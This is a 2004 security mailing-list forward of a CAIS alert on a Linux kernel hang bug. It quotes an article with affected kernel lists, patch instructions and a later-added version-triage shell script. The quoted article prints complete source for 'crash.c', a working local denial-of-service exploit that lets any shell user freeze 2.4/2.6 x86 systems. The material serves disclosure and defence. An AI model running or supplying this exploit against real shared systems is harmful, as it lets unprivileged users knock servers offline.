[SECURITY-L] CAIS-Alert: Vulnerability in the Linux kernel
CSIRT - UNICAMP
security at unicamp.br
Wed Jun 16 09:28:43 -03 2004
----- Forwarded message from Centro de Atendimento a Incidentes de Seguranca <cais at cais.rnp.br> -----
From: Centro de Atendimento a Incidentes de Seguranca <cais at cais.rnp.br>
Subject: CAIS-Alert: Vulnerability in the Linux kernel
To: rnp-alerta at cais.rnp.br, rnp-seg at cais.rnp.br
Date: Mon, 14 Jun 2004 16:56:28 -0300 (BRST)
-----BEGIN PGP SIGNED MESSAGE-----
Dear all,
CAIS has become aware of a piece of malicious code that, when run on a
vulnerable Linux system, can hang the system and so cause a denial of
service.
According to the source of the alert, the problem manifests itself when
the code in question is compiled with GCC versions 3.0, 3.1, 3.2, 3.3 or
3.3.2 and run on systems with Linux kernel versions 2.4.2x or 2.6.x on
the x86 architecture. Systems using AMD64 processors may also be affected.
The problem is made more serious by the fact that the user who compiles
and runs the program does not need privileged access to the system. Thus
any user with shell access to the system can hang the machine.
Affected systems:
Systems using the following kernels were tested and are confirmed
vulnerable:
. Linux kernel 2.6.x
  . 2.6.7-rc2
  . 2.6.6 (vanilla)
  . 2.6.6-rc1 SMP
  . 2.6.6 SMP
  . 2.6.5-gentoo
  . 2.6.5-mm6
  . 2.6.5 (fedora core 2 vanilla)
. Linux kernel 2.4.2x
  . 2.4.26 vanilla
  . 2.4.26, grsecurity 2.0 config
  . 2.4.26-rc1 vanilla
  . 2.4.26-gentoo-r1
  . 2.4.22
  . 2.4.22-1.2188 Fedora FC1 Kernel
  . 2.4.18-bf2.4 (debian woody vanilla)
. Kernels with grsecurity patches
. Linux kernel 2.5.6 SMP
. Linux kernel 2.6.6 SMP
In addition, other kernel versions of the 2.4 and 2.6 series may be
affected by this vulnerability.
Systems *not* affected:
The malicious code does no damage and exits with the error message
"Floating point exception" on systems running the following kernel
versions:
. Linux nudge 2.6.5-1um i686 (the User Mode Linux kernel) Dylan Smith
. Linux Kernel 2.6.4 SMP with the staircase scheduler patch applied Guille
. Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
. Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
. Linux Kernel 2.4.25-gentoo-r1 Charles A. Haines (3G Publishing)
. 2.2.19-kernel
. User Mode Linux kernel 2.6.5-1um. Other User Mode Linux kernel versions
may be unaffected as well.
Available fixes:
To fix the problem, it is recommended to update the kernel and apply a
patch for the kernel in use, as described at:
. http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
More information:
. New Kernel Crash-Exploit discovered
http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
CAIS recommends that administrators always keep their systems and
applications up to date with the latest versions and fixes offered by
the vendors.
CAIS alerts are also available in RSS/RDF format:
http://www.rnp.br/cais/alertas/rss.xml
Regards,
################################################################
# CENTRO DE ATENDIMENTO A INCIDENTES DE SEGURANCA (CAIS)       #
# Rede Nacional de Ensino e Pesquisa (RNP)                     #
#                                                              #
# cais at cais.rnp.br               http://www.cais.rnp.br     #
# Tel. 019-37873300                 Fax. 019-37873301          #
# PGP key available at http://www.rnp.br/cais/cais-pgp.key     #
################################################################
>
>http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
>
>New Kernel Crash-Exploit discovered
>Published 2004-06-11 by xiando, v2.1.5, last updated 2004-06-14.
>A bug lets a simple C program crash the kernel, effectively locking the
>whole system. Affects both 2.4.2x and 2.6.x kernels on the x86 architecture.
>
> 1. The Evil Code
> 2. The Crashing Kernels
> 3. The safe kernels
> 4. The threat
> 5. How to protect yourself
>    * 5.1. Patch for 2.4.2x (vanilla) Kernels
>      o 5.1.1. 2.4.26
>      o 5.1.2. 2.4.25
>      o 5.1.3. 2.4.2x
>    * 5.2. Kernel 2.4.26-rc3-gentoo
>    * 5.3. 2.6.xx kernels
>    * 5.4. amd64
> 6. Bug reports
>
>1. The Evil Code
>
>Running this simple C program crashes the Linux kernel.
>
>crash.c.txt
>
> #include <sys/time.h>
> #include <signal.h>
> #include <unistd.h>
>
> /* SIGALRM handler: saves the x87 FPU state into a user buffer, writes a
>    marker, and restores the saved state again. */
> static void Handler(int ignore)
> {
>     char fpubuf[108];                  /* size of the legacy FSAVE image */
>     __asm__ __volatile__ ("fsave %0\n" : "=m"(fpubuf));
>     write(2, "*", 1);
>     __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
> }
>
> int main(int argc, char *argv[])
> {
>     struct itimerval spec;
>     signal(SIGALRM, Handler);
>     /* fire SIGALRM every 100 microseconds */
>     spec.it_interval.tv_sec = 0;
>     spec.it_interval.tv_usec = 100;
>     spec.it_value.tv_sec = 0;
>     spec.it_value.tv_usec = 100;
>     setitimer(ITIMER_REAL, &spec, NULL);
>     while (1)
>         write(1, ".", 1);
>
>     return 0;
> }
>
>This bug is confirmed to be present when the code is compiled with GCC
>version 3.0, 3.1, 3.2, 3.3 and 3.3.2 and used on Linux kernel versions
>2.4.2x and 2.6.x on x86 and amd64 systems.
>
>2. The Crashing Kernels
>
>Minor numbers are versions verified; this is just the tip of the iceberg:
>
> * Linux 2.6.x
>   o 2.6.7-rc2
>   o 2.6.6 (vanilla)
>   o 2.6.6-rc1 SMP (verified by blaise)
>   o 2.6.6 SMP (verified by riven)
>   o 2.6.5-gentoo (verified by RatiX)
>   o 2.6.5-mm6 (verified by Mariux)
>   o 2.6.5 (fedora core 2 vanilla)
> * Linux 2.4.2x
>   o 2.4.26 vanilla
>   o 2.4.26, grsecurity 2.0 config
>   o 2.4.26-rc1 vanilla
>   o 2.4.26-gentoo-r1
>   o 2.4.22
>   o 2.4.22-1.2188 Fedora FC1 Kernel
>   o 2.4.18-bf2.4 (debian woody vanilla)
>
>Even grsecurity-patched kernels crash. "I would have hoped that grsec would
>have blocked or logged something, but nothing appeared in the logs." Vincent
>
>3. The safe kernels
>
>This code does nothing but exit with the error message "Floating point
>exception" and cannot do any damage to systems running
>
> * Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
> * Linux Kernel 2.6.4 SMP patched with staircase scheduler Guille
> * Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
> * Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
> * Linux Kernel 2.4.25-gentoo-r1 Charles A. Haines (3G Publishing)
> * 2.2.19-kernel
>
>It is unclear why these specific Gentoo patch sets of the 2.4.26 kernel are
>safe. Other versions of the Gentoo kernel are not.
>
>The user-mode Linux kernel 2.6.5-1um is safe. I assume this means other
>versions of user mode Linux are safe.
>
>Linux Kernel 2.6.4 SMP with patches has been reported to be safe. The reporter
>uses a version patched with Con Kolivas' Staircase scheduler (but it only
>affects the task scheduler). Gcc version 3.3.3. "System did not crash, I
>left the crash program 10 minutes and after that I killed the task and I
>continued using my system". Guille
>
>The glitch is verified present in Linux 2.5.6 SMP and Linux 2.6.6 SMP.
>
>The bug is not present in 2.2.19, it seems this bug only affects 2.4 and
>later.
>
>4. The threat
>
>Using this exploit to crash Linux systems requires the (ab)user to have
>shell access. The program works on any normal user account, root access is
>not required. This exploit has been reported used to take down several
>"lame free-shell providers" servers (this is illegal in most parts of the
>world and strongly discouraged).
>
>This code only works on x86 Linux machines. This code does not compile
>(makes no executable) on sparc64 sun4u TI UltraSparc II (BlackBird). This
>doesn't affect NetBSD Stable.
>
>Check your own system yourself if you are wondering if this affects you.
>Better safe than sorry. Assume it will crash, sync (even unmount) your file
>systems before testing. If your system is a production server with 1000 on
>line users then do not test this code on that box.
>
>5. How to protect yourself
>
>The last days were frustrating. Compiling a large number of different
>kernel versions just to find that gcc crash.c -o evil && ./evil halts the
>system is quite dull. I hoped some kernels would be unaffected because
>2.4.26-rc3-gentoo and 2.4.26_pre6-gentoo are, but sadly almost all kernel
>versions die when evil is executed.
>
>The Linux Kernel mailing list is found to the right of this article. You
>may find solutions there not mentioned on this page. The author does
>subscribe and plans to post (better) solutions here as they appear.
>
>5.1. Patch for 2.4.2x (vanilla) Kernels
>
>This just in: 2.4.26_i387.h_patch.txt may be a better solution for 2.4.xx
>kernels (gentoo bugzilla). Not tested by yours truly.
>
>Stian Skjelstad mailed me a working patch for 2.4 kernels.
>
>5.1.1. 2.4.26
>
>I applied it, confirmed that it works with the vanilla 2.4.26 kernel and
>made a diff (diff -ur linux-2.4.26/kernel/signal.c linux-2.4.26-x/kernel/signal.c > signal.c-2.4.26.patch.txt).
>(signal.c-2.4.26.patch.txt)
>
> 1. Read the Kernel Rebuild Guide if this is your first time compiling
>    your own kernel
> 2. Download linux-2.4.26.tar.bz2 from your local Linux Kernel Mirror
> 3. Unpack the kernel source and make a symbolic link:
>    * cd /usr/src/
>    * tar xfvj linux-2.4.26.tar.bz2
>    * ln -s linux-2.4.26 linux
> 4. Download the patch for 2.4.26: signal.c-2.4.26.patch.txt
> 5. Apply the patch
>    * patch -p1 -d /usr/src/linux-2.4.26 <signal.c-2.4.26.patch.txt
> 6. Configure and compile as usual.
>
>5.1.2. 2.4.25
>
>There is no difference (diff linux-2.4.25/kernel/signal.c
>linux-2.4.26/kernel/signal.c) between the signal.c included in 2.4.25 and
>2.4.26; apply signal.c-2.4.26.patch.txt to 2.4.25-vanilla.
>
>5.1.3. 2.4.2x
>
>The patch signal.c-2.4.21.patch.txt
>(diff -ur linux-2.4.21/kernel/signal.c linux-2.4.21-xiando/kernel/signal.c > signal.c-2.4.21.patch.txt)
>is tested and works for Kernel 2.4.21 (vanilla).
>
> 1. Get a vanilla 2.4.21 kernel and install it.
> 2. Apply the patch
>    * patch -p1 -d /usr/src/linux-2.4.26 <signal.c-2.4.21.patch.txt
> 3. Configure and compile as usual.
>
>signal.c.2.4.20.patch.txt is tested by Charlie Macdonald on RedHat's
>2.4.20-31.9.
>
>5.2. Kernel 2.4.26-rc3-gentoo
>
>2.4.26-rc3-gentoo (gentoo-sources-2.4.26_pre5.patch.bz2) is safe. This is a
>patch set for turning linux-2.4.25 -> 2.4.26-rc3-gentoo.
>
>I have no idea why this kernel version is safe from this exploit. It just
>is. This kernel patch set returns Floating point exception instead of
>locking the system when evil is executed.
>
>This kernel can be used on any Linux system. It does not require any
>Gentoo-only tools.
>
> 1. Read the Kernel Rebuild Guide if this is your first time compiling
>    your own kernel
> 2. Download linux-2.4.25.tar.bz2 from your local Linux Kernel Mirror
> 3. Get the patch set for Gentoo 2.4.26-rc3-gentoo (mirror1) (mirror2) aka
>    2.4.26_pre5:
>    * wget http://re.a.la/gs (2,2M)
> 4. Unpack the 2.4.25 kernel source:
>    * cd /usr/src/
>    * tar xfvj linux-2.4.25.tar.bz2
> 5. Apply the Gentoo patchset:
>    * patch -p1 -d /usr/src/linux-2.4.25 <gentoo-sources-2.4.26_pre5.patch
> 6. Rename the kernel and make a symlink from /usr/src/linux:
>    * mv linux-2.4.25 linux-2.4.26-rc3-gentoo
>    * ln -s linux-2.4.26-rc3-gentoo linux
> 7. The Makefile now refers to this kernel as -rc5-gentoo, but when you
>    compile your kernel it claims to be 2.4.26-rc3-gentoo. I assume this is
>    because the original Gentoo ebuild changed the version in the Makefile or
>    another configuration file to make these match. Open the Makefile in your
>    favorite editor and change line 4 to say -rc3-gentoo:
>    * cd linux-2.4.26-rc3-gentoo
>    * nano -w Makefile
>    * "EXTRAVERSION = -rc5-gentoo" -> "EXTRAVERSION = -rc3-gentoo"
> 8. Configure your kernel
>    * Using your old config: cp /usr/src/linux-oldversion/.config .config && make oldconfig
>    * The Linux kernel can be configured with make menuconfig (CLI)
>      and make xconfig (GUI)
> 9. Compile your new kernel and install as usual:
>    * make dep bzImage modules modules_install
>    * mount /boot (some distributions mount /boot on startup)
>    * cp arch/i386/boot/bzImage /boot
>    * You may want to call your new kernel something else and edit
>      Grub's or Lilo's configuration.
>
>Congratulations. You are now running the 2.4.26-rc3-gentoo kernel.
>
>5.3. 2.6.xx kernels
>
>A patch for i387.h (2.6.7-rc3-bk5_i387.h.patch.txt) included in kernel
>2.6.7-rc3-bk5 has been tested successfully on 2.6.5 and 2.6.7-rc3 by Marc
>Ballarin.
>
>It is tested successfully on Linux-2.6.7-rc2 by yours truly.
>
>The i387.h patch seems to be the best solution. When evil is executed it
>does not freeze the system, but unlike the other alternative patches it
>does leave evil running at 99.9% CPU. It can be stopped with ctrl-c, kill
>and killall.
>
> 1. Read the Kernel Rebuild Guide if this is your first time compiling
> your own kernel
> 2. Get a kernel from kernel.org and unpack it to /usr/src
> 3. Get 2.6.7-rc3-bk5_i387.h.patch.txt
> 4. patch -p1 -d /usr/src/linux-2.6.7-rc2 <2.6.7-rc3-bk5_i387.h.patch.txt
> 5. Follow the usual steps.
>
>Other solutions:
>
> * Andi Kleen has posted a patch for linux-2.6.7rc3 in the linux-kernel
>   mail list available at
>   o PATCH fix for Re: timer + fpu stuff locks my console race.
>   o http://lkml.org/lkml/2004/6/12/88
>   o Raw message: andi_kleen_patch.txt
> * Stian Skjelstad's patch also works with 2.6.7
>   o http://lkml.org/lkml/2004/6/12/64
> * Sergey Vlasov has a solution at
>   o http://lkml.org/lkml/2004/6/12/81
>
>5.4. amd64
>
>IMPORTANT: amd64 is affected as well.
>
>The fix is the same as on x86 (it's included in 2.6.7-rc3-bk6). The file
>that needs the change is include/asm-x86_64/i387.h. (Marc Ballarin)
>
>6. Bug reports
>
> * The exploit was reported as gcc bug 15905 2004-06-09.
> * This is reported to the linux-kernel list with the subject "timer + fpu
>   stuff locks my console race".
> * Reported to Gentoo Bugzilla as bug 53804
>
>The latest version of this document is available at
>http://linuxreviews.org/ - Page source:
>
> * t2t:2004-06-11_kernel_crash.t2t.tar.bz2
>
>Copyright (c) 2000-2004 Øyvind Sæther. Permission is granted to copy,
>distribute and/or modify this document under the terms of the GNU Free
>Documentation License, Version 1.2 or any later version published by the
>Free Software Foundation; with no Invariant Sections, no Front-Cover Texts,
>and no Back-Cover Texts. A copy of the license is included in the section
>entitled "GNU Free Documentation License"
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8
iQCVAwUBQM4C8+kli63F4U8VAQEsxAQAqUAf6sFF+gkPhhVsxrboTcnMlCzTCoYa
pDl/fBggn/DlDXIPM4F7EJfMAtGsi9x8OiiO2g0rqI0JUdBAm500wcwCVnn91R9z
sZkB+8vx+6vzeHriHDLInRYETWOVKyrMGPnMGPwdfF3uV22Wfs7Ry90W0bkigsY1
8xYl1Tw9x70=
=3R3M
-----END PGP SIGNATURE-----
----- End forwarded message -----
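The alert and the quoted article leave the administrator with a list of kernel versions that are known to crash, a few that are reported safe, and a patch that first appears in 2.6.7-rc3-bk5. The suggestion in the article to "check your own system yourself" by running the crash program is not something to do on a production host; a version-based triage of the fleet first, followed by a check of whether the signal.c or i387.h patch was actually applied to the 2.4 and pre-2.6.7 kernels, is the defender's alternative. The POSIX shell helper below is an added example, not part of the CAIS alert or the linuxreviews article; `classify_kernel` and `triage_inventory` are hypothetical names, the inventory is constructed sample data, and it assumes that a 2.6.7 release kernel carries the i387.h fix the article places in 2.6.7-rc3-bk5 (release candidates of 2.6.7 are still reported as needing a manual check, since 2.6.7-rc2 is on the crash list).

```shell
#!/bin/sh
# Triage helper for the FPU/timer kernel crash described in the alert above.
# It applies only the rules the alert and article state and, because a
# release string cannot show whether a source patch was applied, never
# reports a 2.4.x or pre-2.6.7 kernel as "safe" on its own.

# classify_kernel <uname -r string>
# Prints one status word:
#   reported-safe            listed by the article as exiting with SIGFPE
#   reported-safe-uml        User Mode Linux kernel (reported safe)
#   not-affected             2.2.x (article: bug only affects 2.4 and later)
#   vulnerable-unless-patched  2.4.x / 2.5.x / 2.6.0-2.6.6 / 2.6.7-rc*
#   fix-included             2.6.7 release or later (assumption, see lead-in)
#   outside-advisory         anything the advisory does not cover
#   unparseable              not a major.minor.patch string (exit status 1)
classify_kernel() {
    rel=$1

    # Exact release strings the article lists as safe (2.4 Gentoo builds).
    case "$rel" in
        2.4.26-rc3-gentoo|2.4.26_pre6-gentoo|2.4.25-gentoo-r1)
            echo "reported-safe"; return 0 ;;
        *um)
            echo "reported-safe-uml"; return 0 ;;
    esac

    case "$rel" in
        *.*.*) ;;
        *) echo "unparseable"; return 1 ;;
    esac

    # major.minor.patch; whatever follows the patch level (-rc2, -gentoo,
    # -1.2188 ...) is kept in "rest" for the release-candidate check.
    major=${rel%%.*}; rest=${rel#*.}
    minor=${rest%%.*}; rest=${rest#*.}
    patch=${rest%%[!0-9]*}; rest=${rest#"$patch"}
    for v in "$major" "$minor" "$patch"; do
        case "$v" in ''|*[!0-9]*) echo "unparseable"; return 1 ;; esac
    done

    if [ "$major" -ne 2 ]; then
        echo "outside-advisory"
    elif [ "$minor" -eq 2 ]; then
        echo "not-affected"
    elif [ "$minor" -eq 4 ] || [ "$minor" -eq 5 ]; then
        # Needs the signal.c (2.4) or i387.h patch; verify in the source tree.
        echo "vulnerable-unless-patched"
    elif [ "$minor" -eq 6 ]; then
        if [ "$patch" -lt 7 ]; then
            echo "vulnerable-unless-patched"
        else
            case "$rest" in
                -rc*) echo "vulnerable-unless-patched" ;;  # 2.6.7-rc2 crashes
                *)    echo "fix-included" ;;               # assumption: 2.6.7 final
            esac
        fi
    else
        echo "outside-advisory"
    fi
}

# triage_inventory: reads "host release" lines on stdin and prints a report.
triage_inventory() {
    while read -r host rel; do
        printf '%-10s %-22s %s\n' "$host" "$rel" "$(classify_kernel "$rel")"
    done
}

# Constructed sample inventory; these are not real hosts.
triage_inventory <<'EOF'
web1 2.4.26
build1 2.6.6
shell1 2.6.5-1um
legacy1 2.2.19
gentoo1 2.4.26-rc3-gentoo
fc1 2.4.22-1.2188
new1 2.6.7
EOF
```

Feed it the output of `uname -r` collected from each host; every line marked vulnerable-unless-patched still needs a look at kernel/signal.c or include/asm-i386/i387.h (include/asm-x86_64/i387.h on amd64) in that host's kernel source before it is counted as fixed.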